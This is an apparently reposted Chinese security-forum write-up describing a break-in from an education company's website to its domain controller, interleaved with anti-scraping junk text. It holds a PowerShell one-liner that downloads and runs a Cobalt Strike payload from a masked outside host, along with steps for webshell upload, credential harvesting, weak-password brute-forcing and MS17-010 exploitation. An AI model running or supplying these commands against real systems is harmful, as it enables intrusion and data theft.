中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

" g2 |6 x2 B/ I, @9 U) U4 t# z 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路/ @( n, Y1 l* G9 F( ]0 N c

1 ^( v# z/ O6 F

9 g2 y2 W0 F9 h: ^   % R5 S- f9 I3 G1 ~7 z

: y, V. l0 L; v

3 b% K# g0 b3 z 正文& ` }! z% e K' Q/ \

) J# [$ l0 c' J- @- e

, w% i' z7 x8 P! Y! O   3 [1 t: V& D, x/ P* e6 X" M* c

' C5 N& q. }# Z6 e9 H- x

" [- `; }1 Y* L) P 目标:www.xxxx.com(一家教育机构)
1 G0 l! n S4 }% [8 b打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能' z! J) ^- v0 d6 o6 i# E7 p/ t) F

4 J# f: U- R9 D5 G; n' r# E

/ S, l5 [6 k9 w% [ vshapes=6 S- ~' k) |4 a, F1 W* X

& L- R% |5 B5 M# o0 ?$ u2 S0 r

8 ^# b2 |8 o0 @$ z& I; G& D9 b 进行了简单的信息搜集
1 M6 y2 J( Q/ \+ c# v6 a4 x
# z1 i/ @% p. L; R) e0 Y9 o) M " N$ K7 b. `! O6 \1 B: D: B

4 M! x1 W0 w) ~9 N

4 v! J, @$ G+ m" {1 }- a6 F 子域名搜集0 ]; P! J2 h! G7 m

" [. i+ ~( t3 {' c5 o

" K, E/ G7 x% |' \6 \% W2 U* x vshapes= 1 o! F J) y( B W2 B

( p. U7 b2 A/ F4 W* E

- a: t( \' R/ H% w: ~6 _5 B) |7 b8 W2 l fofa找资产
* G) t, K7 d" H
# I+ f! Z7 @8 V. E. ` 4 M) @+ J @' [9 ~. y

+ @7 a( K- q! M/ [5 m) F6 ?

8 A& \4 _+ H/ H: I: X7 d" d) G vshapes=/ b8 l( y2 |8 h& p

! [/ X: L" g% [' w' n

1 L; e4 g) i& ~, ]$ o7 r. }" R 一共七个资产。去重之后只有两个。
9 v1 ^# x8 z; q
. r( \9 V- I8 T9 r! H8 `$ b: w# X6 n% D& D6 Z) d% A2 }4 e. t! g

% W; `8 G8 c+ g

+ l a* }% A- l4 M, J1 \0 b: { 目录探测 $ @: j- e8 g; V( `/ Q. k7 `

7 U9 ] @* v5 t+ y F% B

) _4 \# b4 S6 k" i8 s; c4 C( D vshapes=3 \- I* R1 V! B/ f: X1 m

. k3 a+ w1 M/ ?

$ v8 Z {6 ?( j$ h' |6 K 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
' A5 r4 I* D7 I u( g" }
% a. E$ ~4 u# d0 |; _( S" u v6 Z8 Y8 [# b8 J

* c# E- Y' F; z) \$ I5 e

: x, I/ _1 ^5 D& y 我又尝试了通过修改返回包来绕过登录界面1 ?% b. J8 j( z6 z

W' s2 L2 w S0 D

7 M9 a! H$ p6 m4 [7 Q& g vshapes=# i% ~6 a4 k8 h0 s' y& v

3 T+ _4 o/ `" |: |( Z

+ `" R' Q9 M5 [9 n1 i 还是不行,尝试注入无果 6 ~+ ?4 {3 M2 m1 G, Y( b

/ v# k! W' q& z+ f/ [+ S4 ^$ J

, Y6 K' }: D$ u; B, h$ v! ? vshapes= # R$ {0 H% K0 \# f. M

$ S8 ?7 F5 s y1 K( I

& @8 k. I* \0 {% W 不过我目录探测出了一处Spring信息泄露
# t& A- j2 [/ c. @8 B
1 N* Y7 x: o& u' V4 I ; E! _6 I* N* q( n, U: W+ @% a5 W2 z0 l

3 h3 k3 Q6 Z8 X2 d+ z) l

7 z/ S" I$ }- F( O" I8 { vshapes=' B) @: b" k. M* \4 x* n& z/ W' X

s. {6 r7 Q* q

7 s! V5 N6 p! q Z3 ]8 |0 ?' v8 G/ L: k" _ 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录5 \; Y. V2 u: t! v

5 p# T6 J& u( W/ t

) x6 M, K4 J& X5 W vshapes=$ T' g( D+ P+ j

4 p; _6 _* O( t9 o) N

' X7 o5 Q+ k2 ]( i" f. [5 k: L 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。, a& q5 P( f( C

5 u! m3 C1 X* D8 @" _

% N' h9 E8 U' T1 V. \5 Y8 c vshapes=# a$ O- v; @. u; ]- C+ Z( z, v

7 u+ q- g9 s, `9 r7 r

& h: z5 H* T4 `. B, z2 J- N( a 获取有些师傅到这一步就手机抓包电脑测了。3 g5 H" e* q5 ]( b, g; |+ V* y

1 G. }/ h, P3 A1 L$ ~6 H

. V, E6 I: `6 C Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。( ^3 b8 L9 M" f, V

6 ?* {- P' y% Y; O q& W

4 o' s: s% a# b& Y 其中在一个公众号发现了小程序,可以进行注册。/ P! v. v/ S! x$ v2 M

8 T3 N# P7 U/ C

1 v& c6 U& \3 V4 P 看到了头像上传,尝试上传获取WebShell" A- F( c1 t' Q! U) A) ~) E

& I/ o6 c+ R7 k7 A- I# b; n

$ U5 y, I1 J% K4 h: [7 L: ^6 A% D1 F vshapes= 9 g1 s+ ]0 [ R3 m; E; y

% @9 Q) G: P+ {' o7 j5 b

) `9 A g# ~% S- A j! w. ] 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 3 U- O+ F4 u' S' Z8 q0 ^* B, X7 B

! V) a4 W7 c6 x4 k& B; S% t3 \

8 _, C9 ^- X" x! h c' D7 r6 O vshapes=- j Z- w, `1 x F0 d8 m

' P: I3 `; |$ ~1 J0 N' s

) j/ S" |( s; O& U4 J 然后上了大马 ! R1 h2 R- |, M1 Q( {

0 [6 J& c% \5 s2 r! F/ g+ b

) B" _, @2 a, u, _0 o/ P+ o5 q0 J vshapes=- a. |: I& F3 F+ J: D6 x

f9 t* I9 L" S& |9 `* s

! t& C+ _+ l" v, ^- U2 _7 D7 C% c vshapes=3 d. q8 L) ]) L9 x! S; ~

6 a8 S7 C5 U0 u' U% L

7 A& P3 G; @0 l+ Z 通过翻找文件发现数据库账号密码9 {/ o3 G% M9 c; a

7 `+ b( }' Y J. ^" n

* S/ G; S5 u% {5 \8 P3 K" d; [9 O vshapes=3 F+ ` D& H2 j* j

2 X. k5 t) L$ G6 x [! @

& X; X/ Z1 f! g1 c --内网渗透 / w% ~/ M2 ?+ M2 `

' a3 E) B# x9 y9 i {

1 O& y% B( Z& m( J 直接通过powershell执行 cs上线% ^5 ]2 P& g2 C' k" ~6 n

$ M1 m! o- W5 z& q1 Z

, _% O$ X9 J; Q! w+ y9 \* T3 m1 ` powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"# C0 F3 K; G c( u9 O, r( l' A* G

. N" c* L! l$ f

l* V7 T+ }" S4 Z vshapes=! q- @8 n: |" O

$ m, N6 J4 ^, k6 m1 M+ p5 |

0 X( R9 t# E& t 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破) D" Z/ G& v4 G# |- m ?! Z4 r

- e( U& C# O- U" b* e! a

$ @% V/ G7 O, X6 h$ m vshapes= , d. C5 h# [( _. p) P. o7 i) t

8 w' u# ~: g+ ~% S7 O

) c3 n, Z5 w! d9 q, | 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
U- C- r& j- k8 h
3 d" \# M: W1 y; S
9 C5 f B% M1 E [: K. }5 c : e& S. e5 q2 R0 b

( J @ P' m# E9 j& e; M/ V0 @

$ Z' S& _9 f! |8 ^ vshapes=5 a- u+ }* h T* P3 T

; U) Y, S0 ~6 m6 q( d. D6 ?

" M3 b$ [' w, C. h. R# q 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
5 d' u9 e3 R/ Q$ B, Y7 |
# E: z$ A) |5 e' Z5 ^ % ?7 i+ N1 T. @/ g* K6 L

# [! X# y! I4 g8 [

7 ~+ p* n/ ?4 W vshapes= ; T# z/ ^7 i* a1 c" H

# L5 P3 m3 K+ W# y. ?+ _! S

( L! E, } i' {
$ |4 E; c; d$ R4 ~8 f
( T0 j6 }; Q2 t " M7 f i/ n. S1 {+ E7 Y& ]$ @3 r

2 L+ f: a# B2 A

5 x0 K: p* a* \8 b" D, a. s7 D  " B& }5 ?* d% ^, x* u) _

" E2 o8 @+ r- O0 J7 V! q

" d4 D3 O7 B9 G 小结 6 ] ?# b8 i: U0 u: c+ V

& X% z$ J$ v6 `2 E. S8 X/ t

& I5 w4 R7 `. E9 Y8 N  9 S O( s$ R* ]- \5 D/ q9 y

/ J6 M8 Q/ B3 A9 M- u

1 X& O: j" B# Q4 w/ p5 h 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! : x* L/ D4 c# k: T0 {0 S' p

- Z, a* J# ~; B( L N

3 g( a3 D# ?( C9 j5 e9 f   8 }6 {' E& J" ? w

) O% q" L2 z# I; N, G ; V$ N3 {) {* B8 |/ a1 q* s

0 X! f _$ J, ~# h1 t+ c 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html " H+ h8 R1 r, j

2 F: f' l8 u5 p. r% g

6 l1 x2 d1 `1 _5 Y j6 x5 I   . q. k- p9 K$ Q1 h





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2